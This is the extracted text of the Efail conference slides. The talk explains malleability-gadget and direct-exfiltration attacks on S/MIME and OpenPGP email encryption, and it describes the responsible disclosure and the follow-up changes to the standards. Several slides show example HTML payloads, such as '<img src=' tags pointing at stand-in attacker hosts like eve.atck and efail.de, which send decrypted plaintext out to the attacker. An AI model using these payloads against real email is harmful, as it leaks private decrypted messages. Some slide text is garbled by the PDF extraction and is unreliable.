Efail: Breaking S/MIME and Openpgp Email Encryption Using Exfiltration Channels
Total Page:16
File Type:pdf, Size:1020Kb
Efail: Breaking S/MIME and OpenPGP Email Encryption using Exfiltration Channels Damian Poddebniak1, Christian Dresen1, Jens Müller2, 1 Münster University of Applied Sciences Fabian Ising1, Sebastian Schinzel1, Simon Friedberger3, 2 Ruhr University Bochum Juraj Somorovsky2, Jörg Schwenk2 3 NXP Semiconductors Damian Poddebniak1, Christian Dresen1, Jens Müller2, Fabian Ising1, Sebastian Schinzel1, Simon Friedberger3, Juraj Somorovsky2, Jörg Schwenk2 Motivation for using end-to-end encryption Nation state attackers • Massive collection of emails • Snowden’s global surveillance disclosure Breach of email provider / email account • Single point of failure • Aren’t they reading/analyzing my emails anyway? Insecure Transport • TLS might be used – we don’t know! 2 Two competing standards OpenPGP (RFC 4880) • Favored by privacy advocates • Web-of-trust (no authorities) S/MIME (RFC 5751) • Favored by organizations • Multi-root trust-hierarchies 3 History of secure email Mostly usability studies 4 Both standards use old crypto Both standards use old crypto Ciphertext C = Enc(M) C1 valid/invalid C2 valid/invalid … M = Dec(C) (repeated several times) 5 Old crypto has no negative impact CBC / CFB modes of operation used, but their usage is not exploitable Old crypto has no negative impact Assumption: Email is non-interactive 6 Backchannel • Any functionality that forces the email client to interact with the network • HTML/CSS <img src="http://efail.de"> • JavaScript XSSDisposition<object cheatdatasheets-Notification="ftp://efail.de-To: ">[email protected] • Email header Remote<style>@import-Attachment '//efail.de-URL: http://efail.de'</style> X...-Image-URL: http://efail.de • Attachment preview PDF, SVG, VCards, etc. OCSP,… CRL, intermediate certs • Certificate verification 7 Evaluation of backchannels in email clients Outlook Postbox Live Mail The Bat! eM Client W8Mail Windows IBM Notes Foxmail Pegasus Mulberry WLMail W10Mail Thunderbird KMail Claws Linux Evolution Trojitá Mutt Apple Mail macOS Airmail MailMate Backchannels Mail App CanaryMail Outlook iOS found K-9 Mail MailDroid Android R2Mail Nine GMail Yahoo! GMX Mail.ru ProtonMail Mailbox Webmail Outlook.com iCloud HushMail FastMail Mailfence ZoHo Mail Roundcube Horde IMP Exchange GroupWise Webapp RainLoop AfterLogic Mailpile ask user leak by default leak via bypass script execution 8 Attacker model 9 Overview 1. Malleability Gadget Attacks on S/MIME 2. Malleability Gadget Attacks on OpenPGP 3. Direct Exfiltration Attacks 4. Responsible Disclosure 5. Conclusions 10 S/MIME uses CBC Source: wikipedia • Cipher Block Chaining mode of operation • Not authenticated • Vulnerable to many attacks (TLS, XML Encryption, SSH) • Basic problem: malleability Malleability of CBC C0 C1 C2 decryption decryption P0 P1 12 Malleability of CBC C0' C1 C2 decryption decryption Content-type: te xt/html\nDear Bob P0' P1 13 Malleability of CBC C0' C1 C2 decryption decryption Zontent-type: te xt/html\nDear Bob P0' P1 14 Malleability of CBC C0 ⊕ P0 C1 C2 decryption decryption 0000000000000000 xt/html\nDear Bob P0' P1 CBC Gadget 15 Malleability of CBC C0 ⊕ P0 ⊕ Pc C1 C2 decryption decryption <img src=”ev.il/ xt/html\nDear Bob P0' P1 16 Malleability of CBC C0 C1' C2 decryption decryption Content-type: te Zt/html\nDear Bob P0' P1' 17 Malleability of CBC C0 C1' C2 decryption decryption ???????????????? Zt/html\nDear Bob P0' P1' 18 Practical Attack against S/MIME Content-type: te xt/html\nDear Sir or Madam, the se ecret meeting wi Original Crafted ???????????????? <img " ???????????????? " src="efail.de/ Content-type: te xt/html\nDear Sir or Madam, the se ecret meeting wi ???????????????? "> 19 Practical Attack against S/MIME 20 Overview 1. Malleability Gadget Attacks on S/MIME 2. Malleability Gadget Attacks on OpenPGP 3. Direct Exfiltration Attacks 4. Responsible Disclosure 5. Conclusions 21 OpenPGP • OpenPGP uses a variation of CFB-Mode • Uses integrity protection • Compression is enabled by default Ci Ci+1 Ci X encryption encryption encryption encryption ? ? ? ? ? ? ? ? random plaintext Pi (known) Pi-1 Pc (chosen) 22 OpenPGP – integrity protection • Integrity protection is performed by adding an MDC at the end of the packet TAG 18 LENGTH <encrypted> TAG 8 LENGTH Tag Type of PGP packet <compressed> TAG 11 LENGTH 8 CD: Compressed Data Packet Content-Type:multipart/mixed; boundary=“ 9 SE: Symmetrically Encrypted Packet … … 11 LD: Literal Data Packet 18 SEIP: Symmetrically Encrypted and Integrity TAG 19 LENGTH Protected Packet efa3e9ca54f0879c5b187636c23b7de376a5ba41 19 MDC: Modification Detection Code Packet 23 RFC4880 on Modification Detection Codes Defeating integrity protection Client Plugin (up to version) MDC Stripped MDC Incorrect SEIP -> SE Outlook 2007 GPG4WIN 3.0.0 Outlook 2010 GPG4WIN OutlookMDC 2013 StrippedGPG4WIN MDC Incorrect SEIP -> SE Outlook 2016 GPG4WIN Thunderbird Enigmail 1.9.9 Apple Mail (OSX) GPGTools 2018.01 Vulnerable Not Vulnerable 25 OpenPGP compression • Challenge: create chosen compressed plaintext • In a nutshell: • Our shortest exploit needs 11 bytes of known plaintext • The first 4 bytes are known header data • Remaining 7 bytes have to be guessed ? ? ? ? ? ? ? 26 Guessing bytes in compression PGP-encrypted Facebook password recovery • 211 guesses to break every email PGP-encrypted Enron dataset • 500 guesses to break 41% of the emails Multiple guesses per email possible • Up to 1000 MIME parts per email 27 Defeating Deflate Exploiting the compression algoritm af 02 78 9c ... a3 ... ? ? ? ? ? ? ? ? <img ? ? ? ? ? ? ? ? src=“efail.de/ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? B1 B2 B3 B4 … random plaintext random plaintext random plaintext Uncom pressed segm ent Com pressed segm ent with fragm ents with backreferences af 02 78 9c ... a3 ... <img src=“efail.de/ 34 Overview 1. Malleability Gadget Attacks on S/MIME 2. Malleability Gadget Attacks on OpenPGP 3. Direct Exfiltration Attacks 4. Responsible Disclosure 5. Conclusions 35 Direct exfiltration • This attack is possible since 2003 in Thunderbird • Independent of the applied encryption scheme • Somewhat fixable in implementation • But works directly in … • Apple Mail / Mail App • Thunderbird • Postbox • … • The standards do not give any definition for that! 36 Direct exfiltration Alice’s mail program encrypts the email Alice writes a Mail to Bob Encrypting From: Alice To: Bob -----BEGIN PGP MESSAGE----- Dear Bob, hQIMA1n/0nhVYSIBARAAiIsX1QsH the meeting tomorrow will be ZObL2LopVexVVZ1uvk3wieArHUg… at 9 o‘clock. -----END PGP MESSAGE----- 37 Direct exfiltration Eve’s attack E-Mail Eve modifiescaptures the emailencrypted and sendsmail between it to Bob Alice or Alice and Bob From: Eve To: Bob Content-Type: text/html Original E-Mail <img src="http://eve.atck/ From: Alice To: Bob -----BEGIN PGP MESSAGE----- hQIMA1n/0nhVYSIBARAAiIsX1QsH ZObL2LopVexVVZ1uvk3wieArHUg… Content-Type: text/html -----END PGP MESSAGE----- "> 38 Direct exfiltration Bob’s mail program puts the Eve’s attack E-Mail decryptsclear text the back email into the body From: Eve To: Bob Decrypting Content-Type: text/html <img src="http://eve.atck/ -----BEGIN PGP MESSAGE----- Dear Bob, hQIMA1n/0nhVYSIBARAAiIsX1QsH the meeting tomorrow will be ZObL2LopVexVVZ1uvk3wieArHUg… at 9 o‘clock. -----END PGP MESSAGE----- Content-Type: text/html "> 39 Direct exfiltration Eve’s attack E-Mail From: Eve To: Bob Content-Type: text/html GET<img /Dear%20Bob%2C%0D%0Athesrc="http://eve.atck/ %20meeting%20tomorrow%20willsrc="http://eve.atck/Dear Dear%20be%20at%209%20o%E2%80%98cBob, Bob, thelock.meeting tomorrow will be at 9 o‘clock..“> Eve Content-Type: text/html "> 40 Overview 1. Malleability Gadget Attacks on S/MIME 2. Malleability Gadget Attacks on OpenPGP 3. Direct Exfiltration Attacks 4. Responsible Disclosure 5. Conclusions 41 S/MIME OpenPGP 42 In May many clients still vulnerable • Direct exfiltration attacks against Apple Mail or Thunderbird Responsible disclosure One day before disclosure … It did not work well • Embargo broken • Community angry • Of course, nobody read the paper • Support from the crypto/security community Impact on the standards S/MIME standard draft - draft-ietf-lamps-rfc5751-bis-11 • References EFAIL paper • Recommends the usage of authenticated encryption with AES-GCM OpenPGP standard draft - draft-ietf-openpgp-rfc4880bis-05 • Deprecates Symmetrically Encrypted (SE) data packets • Proposes AEAD protected data packets • Implementations should not allow users to access erroneous data 47 Overview 1. Malleability Gadget Attacks on S/MIME 2. Malleability Gadget Attacks on OpenPGP 3. Direct Exfiltration Attacks 4. Responsible Disclosure 5. Conclusions 48 Conclusions • Introduced malleability gadgets Thank you! • Self-exfiltrating plaintexts Questions? • Evaluation of backchannels • Crypto standards need to evolve • Current S/MIME is broken • OpenPGP needs clarification https://www.efail.de/ • Secure HTML email is challenging 49.